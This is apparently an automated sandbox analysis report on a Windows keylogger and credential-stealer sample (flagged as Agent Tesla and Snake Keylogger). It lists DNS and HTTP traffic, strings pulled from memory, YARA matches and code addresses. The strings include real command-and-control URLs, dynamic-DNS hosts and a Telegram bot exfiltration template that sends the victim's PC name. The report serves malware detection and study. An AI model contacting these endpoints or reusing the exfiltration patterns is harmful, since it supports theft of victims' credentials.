Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: smtp.inhousepick.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 22 Oct 2024 13:42:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 22 Oct 2024 13:42:40 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2148454163.000000000299A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000B.00000002.2193945659.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.inhousepick.com
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20a
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002E67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.00000000029D2000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002890000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002890000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.00000000028BA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76$
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002A03000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49830 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large array initializations

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, Keyboard.cs

Large array initialization: : array initializer size 620783

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_00D4F3C4	0_2_00D4F3C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_06CC0F9A	0_2_06CC0F9A
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_06CC0FA0	0_2_06CC0FA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_06CC9228	0_2_06CC9228
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_06CC13D8	0_2_06CC13D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_06CC38DA	0_2_06CC38DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_06CC38E8	0_2_06CC38E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_06CC1810	0_2_06CC1810
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_06CC3010	0_2_06CC3010
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1C146	9_2_00E1C146
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1D278	9_2_00E1D278
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E15362	9_2_00E15362
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1C468	9_2_00E1C468
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1C738	9_2_00E1C738
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E169A0	9_2_00E169A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1E988	9_2_00E1E988
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E13AA1	9_2_00E13AA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1CA08	9_2_00E1CA08
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1CCD8	9_2_00E1CCD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E19DE0	9_2_00E19DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E16FC8	9_2_00E16FC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1CFAC	9_2_00E1CFAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1F974	9_2_00E1F974
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E1E97C	9_2_00E1E97C
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E13E09	9_2_00E13E09
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_015EF3C4	11_2_015EF3C4
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_058793D1	11_2_058793D1
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_058793E0	11_2_058793E0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_07600FA0	11_2_07600FA0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_07600F9A	11_2_07600F9A
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_076085C0	11_2_076085C0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_076013D8	11_2_076013D8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_07601810	11_2_07601810
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_07603010	11_2_07603010
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_076038E8	11_2_076038E8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_076038DA	11_2_076038DA
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9A088	15_2_00F9A088
